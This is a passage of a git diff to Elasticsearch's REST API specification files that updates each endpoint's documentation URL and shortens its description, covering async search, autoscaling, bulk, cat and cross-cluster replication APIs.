a44c0648f2e8f..4e1ce41624a8c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.status.json @@ -1,8 +1,8 @@ { "async_search.status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/async-search.html", - "description": "Retrieves the status of a previously submitted async search request given its ID." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-async-search-submit", + "description": "Get the async search status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.submit.json b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.submit.json index 8ae2fff22281c..b7d8a1272d1af 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.submit.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.submit.json @@ -1,8 +1,8 @@ { "async_search.submit":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/async-search.html", - "description": "Executes a search request asynchronously." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-async-search-submit", + "description": "Run an async search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.delete_autoscaling_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.delete_autoscaling_policy.json index 79b542b73ca2e..89afca7b4c5fb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.delete_autoscaling_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.delete_autoscaling_policy.json @@ -1,8 +1,8 @@ { "autoscaling.delete_autoscaling_policy":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-delete-autoscaling-policy.html", - "description":"Deletes an autoscaling policy. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-delete-autoscaling-policy", + "description":"Delete an autoscaling policy" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_capacity.json b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_capacity.json index b75ac52e3da23..ff9776b1e358c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_capacity.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_capacity.json @@ -1,8 +1,8 @@ { "autoscaling.get_autoscaling_capacity":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-get-autoscaling-capacity.html", - "description": "Gets the current autoscaling capacity based on the configured autoscaling policy. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-get-autoscaling-capacity", + "description": "Get the autoscaling capacity" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_policy.json index 1b0344245f174..b4b506fb60803 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_policy.json @@ -1,8 +1,8 @@ { "autoscaling.get_autoscaling_policy":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-get-autoscaling-policy.html", - "description": "Retrieves an autoscaling policy. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-get-autoscaling-capacity", + "description": "Get an autoscaling policy" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.put_autoscaling_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.put_autoscaling_policy.json index 7e835fbe8dc43..dc7c862a2d027 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.put_autoscaling_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.put_autoscaling_policy.json @@ -1,8 +1,8 @@ { "autoscaling.put_autoscaling_policy":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-put-autoscaling-policy.html", - "description": "Creates a new autoscaling policy. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-put-autoscaling-policy", + "description": "Create or update an autoscaling policy" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/bulk.json b/rest-api-spec/src/main/resources/rest-api-spec/api/bulk.json index 490bb6fd73bbe..5635d61d61355 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/bulk.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/bulk.json @@ -1,8 +1,8 @@ { "bulk":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-bulk.html", - "description":"Allows to perform multiple index/update/delete operations in a single request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-bulk", + "description":"Bulk index or delete documents" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.aliases.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.aliases.json index 9f97fe6280dc0..6ef0c07637497 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.aliases.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.aliases.json @@ -1,8 +1,8 @@ { "cat.aliases":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-alias.html", - "description":"Shows information about currently configured aliases to indices including filter and routing infos." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-aliases", + "description":"Get aliases" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.allocation.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.allocation.json index 9d19d8bb9569d..b729d1a0084c9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.allocation.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.allocation.json @@ -1,8 +1,8 @@ { "cat.allocation":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-allocation.html", - "description":"Provides a snapshot of how many shards are allocated to each data node and how much disk space they are using." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-allocation", + "description":"Get shard allocation information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.component_templates.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.component_templates.json index 9dfeaf5575967..80ec61b4a85b5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.component_templates.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.component_templates.json @@ -1,8 +1,8 @@ { "cat.component_templates":{ "documentation":{ - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-component-templates.html", - "description":"Returns information about existing component_templates templates." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-component-templates", + "description":"Get component templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.count.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.count.json index 64226f87bfd0f..1ed48e9d3a32c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.count.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.count.json @@ -1,8 +1,8 @@ { "cat.count":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-count.html", - "description":"Provides quick access to the document count of the entire cluster, or individual indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-count", + "description":"Get a document count" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.fielddata.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.fielddata.json index 497287a34ade5..4892a4caa3331 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.fielddata.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.fielddata.json @@ -1,8 +1,8 @@ { "cat.fielddata":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-fielddata.html", - "description":"Shows how much heap memory is currently being used by fielddata on every data node in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-fielddata", + "description":"Get field data cache information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.health.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.health.json index 6b49c8e4428f7..e3cba20ad6dfd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.health.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.health.json @@ -1,8 +1,8 @@ { "cat.health":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-health.html", - "description":"Returns a concise representation of the cluster health." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-health", + "description":"Get the cluster health status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.help.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.help.json index d31188fe7f7fc..629246db7f4e3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.help.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.help.json @@ -1,8 +1,8 @@ { "cat.help":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat.html", - "description":"Returns help for the Cat APIs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-cat", + "description":"Get CAT help" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.indices.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.indices.json index a809c96c3798a..ffc33a3ca16e5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.indices.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.indices.json @@ -1,8 +1,8 @@ { "cat.indices":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-indices.html", - "description":"Returns information about indices: number of primaries and replicas, document counts, disk size, ..." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-indices", + "description":"Get index information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.master.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.master.json index 9041c48b17ec5..d2c48ebda82db 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.master.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.master.json @@ -1,8 +1,8 @@ { "cat.master":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-master.html", - "description":"Returns information about the master node." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-master", + "description":"Get master node information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_data_frame_analytics.json index ded66961c3ed5..e0d52c6d75ed3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_data_frame_analytics.json @@ -1,8 +1,8 @@ { "cat.ml_data_frame_analytics":{ "documentation":{ - "url":"http://www.elastic.co/guide/en/elasticsearch/reference/current/cat-dfanalytics.html", - "description": "Gets configuration and usage information about data frame analytics jobs." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-data-frame-analytics", + "description": "Get data frame analytics jobs" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_datafeeds.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_datafeeds.json index 884f1bad7583a..8784b2a7c5e19 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_datafeeds.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_datafeeds.json @@ -1,8 +1,8 @@ { "cat.ml_datafeeds":{ "documentation":{ - "url":"http://www.elastic.co/guide/en/elasticsearch/reference/current/cat-datafeeds.html", - "description": "Gets configuration and usage information about datafeeds." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-datafeeds", + "description": "Get datafeeds" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_jobs.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_jobs.json index 91f0e63742b15..38f3b4fc68d65 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_jobs.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_jobs.json @@ -1,8 +1,8 @@ { "cat.ml_jobs":{ "documentation":{ - "url":"http://www.elastic.co/guide/en/elasticsearch/reference/current/cat-anomaly-detectors.html", - "description": "Gets configuration and usage information about anomaly detection jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-jobs", + "description": "Get anomaly detection jobs" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_trained_models.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_trained_models.json index 5176b9d4ca69f..c0d95b222fd86 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_trained_models.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_trained_models.json @@ -1,8 +1,8 @@ { "cat.ml_trained_models":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/cat-trained-model.html", - "description": "Gets configuration and usage information about inference trained models." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-trained-models", + "description": "Get trained models" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodeattrs.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodeattrs.json index b92f023323342..8e65962dbafe6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodeattrs.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodeattrs.json @@ -1,8 +1,8 @@ { "cat.nodeattrs":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-nodeattrs.html", - "description":"Returns information about custom node attributes." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-nodeattrs", + "description":"Get node attribute information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodes.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodes.json index b1205e38ecd40..779b7111fb284 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodes.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodes.json @@ -1,8 +1,8 @@ { "cat.nodes":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-nodes.html", - "description":"Returns basic statistics about performance of cluster nodes." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-nodes", + "description":"Get node information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.pending_tasks.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.pending_tasks.json index 40601a11b6803..214ba308bd34f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.pending_tasks.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.pending_tasks.json @@ -1,8 +1,8 @@ { "cat.pending_tasks":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-pending-tasks.html", - "description":"Returns a concise representation of the cluster pending tasks." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-pending-tasks", + "description":"Get pending task information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.plugins.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.plugins.json index 48635d2fe06e0..c3bbba5e2aabe 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.plugins.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.plugins.json @@ -1,8 +1,8 @@ { "cat.plugins":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-plugins.html", - "description":"Returns information about installed plugins across nodes node." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-plugins", + "description":"Get plugin information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.recovery.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.recovery.json index 879314629f968..020ad1111be11 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.recovery.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.recovery.json @@ -1,8 +1,8 @@ { "cat.recovery":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-recovery.html", - "description":"Returns information about index shard recoveries, both on-going completed." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-recovery", + "description":"Get shard recovery information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.repositories.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.repositories.json index 3dad7a0039c6c..53c1a9f3033b9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.repositories.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.repositories.json @@ -1,8 +1,8 @@ { "cat.repositories":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-repositories.html", - "description":"Returns information about snapshot repositories registered in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-repositories", + "description":"Get snapshot repository information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.segments.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.segments.json index eee7e5a5c4b29..723b00ddd8d84 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.segments.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.segments.json @@ -1,8 +1,8 @@ { "cat.segments":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-segments.html", - "description":"Provides low-level information about the segments in the shards of an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-segments", + "description":"Get segment information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.shards.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.shards.json index 24f4a4beceae5..f19e5b708ed47 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.shards.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.shards.json @@ -1,8 +1,8 @@ { "cat.shards":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-shards.html", - "description":"Provides a detailed view of shard allocation on nodes." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-shards", + "description":"Get shard information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.snapshots.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.snapshots.json index 3b72e8a1ebc1a..6e69435f9d7bc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.snapshots.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.snapshots.json @@ -1,8 +1,8 @@ { "cat.snapshots":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-snapshots.html", - "description":"Returns all snapshots in a specific repository." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-snapshots", + "description":"Get snapshot information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.tasks.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.tasks.json index e7329cf8dbbf0..25e4a26d98546 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.tasks.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.tasks.json @@ -1,8 +1,8 @@ { "cat.tasks":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/tasks.html", - "description":"Returns information about the tasks currently executing on one or more nodes in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-tasks", + "description":"Get task information" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.templates.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.templates.json index e7ac67c8612b9..3261afdaa7380 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.templates.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.templates.json @@ -1,8 +1,8 @@ { "cat.templates":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-templates.html", - "description":"Returns information about existing templates." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-templates", + "description":"Get index template information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.thread_pool.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.thread_pool.json index 1bd61a29725c1..85e752d3b3718 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.thread_pool.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.thread_pool.json @@ -1,8 +1,8 @@ { "cat.thread_pool":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-thread-pool.html", - "description":"Returns cluster-wide thread pool statistics per node.\nBy default the active, queue and rejected statistics are returned for all thread pools." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-thread-pool", + "description":"Get thread pool statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.transforms.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.transforms.json index c0dd769dc3d50..1a3938d275f83 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.transforms.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.transforms.json @@ -1,8 +1,8 @@ { "cat.transforms":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/cat-transforms.html", - "description": "Gets configuration and usage information about transforms." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-transforms", + "description": "Get transform information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.delete_auto_follow_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.delete_auto_follow_pattern.json index c316e9fcbd36c..0078a8fa53cc5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.delete_auto_follow_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.delete_auto_follow_pattern.json @@ -1,8 +1,8 @@ { "ccr.delete_auto_follow_pattern":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-delete-auto-follow-pattern.html", - "description": "Deletes auto-follow patterns." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-delete-auto-follow-pattern", + "description": "Delete auto-follow patterns" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow.json index 642477cb45e48..cc019dfeec0ad 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow.json @@ -1,8 +1,8 @@ { "ccr.follow":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-put-follow.html", - "description": "Creates a new follower index configured to follow the referenced leader index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow", + "description": "Create a follower" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_info.json index a2af3f9be77d1..2878e0e6fb024 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_info.json @@ -1,8 +1,8 @@ { "ccr.follow_info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-get-follow-info.html", - "description": "Retrieves information about all follower indices, including parameters and status for each follower index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow-info", + "description": "Get follower information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_stats.json index 75d0bafb5083e..ad0fe0960e1ec 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_stats.json @@ -1,8 +1,8 @@ { "ccr.follow_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-get-follow-stats.html", - "description": "Retrieves follower stats. return shard-level stats about the following tasks associated with each shard for the specified indices." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow-stats", + "description": "Get follower stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.forget_follower.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.forget_follower.json index 61a132a1f4ac4..308d1c72b3fe7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.forget_follower.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.forget_follower.json @@ -1,8 +1,8 @@ { "ccr.forget_follower":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-post-forget-follower.html", - "description": "Removes the follower retention leases from the leader." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-forget-follower", + "description": "Forget a follower" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.get_auto_follow_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.get_auto_follow_pattern.json index 663f37fca3a9a..b4ddda356f891 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.get_auto_follow_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.get_auto_follow_pattern.json @@ -1,8 +1,8 @@ { "ccr.get_auto_follow_pattern":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-get-auto-follow-pattern.html", - "description": "Gets configured auto-follow patterns. Returns the specified auto-follow pattern collection." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-get-auto-follow-pattern-1", + "description": "Get auto-follow patterns" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_auto_follow_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_auto_follow_pattern.json index c766304fc0512..ea1688a30b90c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_auto_follow_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_auto_follow_pattern.json @@ -1,8 +1,8 @@ { "ccr.pause_auto_follow_pattern":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-pause-auto-follow-pattern.html", - "description": "Pauses an auto-follow pattern" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-pause-auto-follow-pattern", + "description": "Pause an auto-follow pattern" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_follow.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_follow.json index 1c1fcf71d08ff..5d850837e42e1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_follow.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_follow.json @@ -1,8 +1,8 @@ { "ccr.pause_follow":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-post-pause-follow.html", - "description": "Pauses a follower index. The follower index will not fetch any additional operations from the leader index." 
